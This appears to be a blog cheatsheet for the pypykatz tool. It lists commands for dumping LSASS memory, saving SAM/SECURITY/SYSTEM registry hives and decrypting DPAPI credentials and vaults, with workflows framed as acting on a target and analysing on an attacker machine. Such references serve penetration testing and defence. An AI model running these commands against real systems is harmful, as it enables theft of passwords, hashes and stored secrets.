Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

pypykatz Cheatsheet

Installation

pip3 install pypykatz

LSASS Dump Analysis

CommandDescription
pypykatz lsa minidump lsass.dmpParse LSASS dump
pypykatz lsa minidump lsass.dmp -o jsonJSON output
pypykatz lsa minidump /path/ -rRecursive directory
pypykatz live lsaLive LSASS (Windows, admin)

Registry Hive Extraction

# Full extraction
pypykatz registry --sam SAM --security SECURITY --system SYSTEM

# SAM only
pypykatz registry --sam SAM --system SYSTEM

# LSA secrets only
pypykatz registry --security SECURITY --system SYSTEM

DPAPI / Credential Manager

Decrypt Credential Files

pypykatz dpapi credential <cred_file> <masterkey>
pypykatz dpapi credentials <creds_dir> --mkf <masterkey_file>

Decrypt Vault Credentials

pypykatz dpapi vcrd <vcrd_file> <masterkey>

Decrypt Masterkey

# With password
pypykatz dpapi masterkey <masterkey_file> -p <password>

# With domain backup key
pypykatz dpapi masterkey <masterkey_file> --pvk <backup.pvk>

# Generate prekey
pypykatz dpapi prekey password <SID> <password>

Quick Reference

Create LSASS Dump (Windows)

procdump.exe -ma lsass.exe lsass.dmp
rundll32 comsvcs.dll MiniDump <PID> lsass.dmp full

Export Registry Hives (Windows)

reg save HKLM\SAM SAM
reg save HKLM\SECURITY SECURITY
reg save HKLM\SYSTEM SYSTEM

Credential Locations

TypePath
User Credentials%AppData%\Microsoft\Credentials\
User Vault%AppData%\Microsoft\Vault\
User Masterkeys%AppData%\Microsoft\Protect\<SID>\
System Credentials%SystemRoot%\System32\config\systemprofile\...

Output Formats

OptionFormat
-o textHuman-readable (default)
-o jsonJSON
-o grepGrep-friendly

Common Workflows

Offline LSASS Analysis

# 1. Dump on target
procdump.exe -ma lsass.exe lsass.dmp

# 2. Analyze on attacker (any OS)
pypykatz lsa minidump lsass.dmp

Credential Manager Extraction

# 1. Get masterkeys from LSASS
pypykatz lsa minidump lsass.dmp | grep -i dpapi

# 2. Decrypt credential file
pypykatz dpapi credential <cred_file> <guid>:<key_hex>

ToolUse Case
MimikatzLive Windows attacks
LaZagneApplication credentials
ImpacketRemote attacks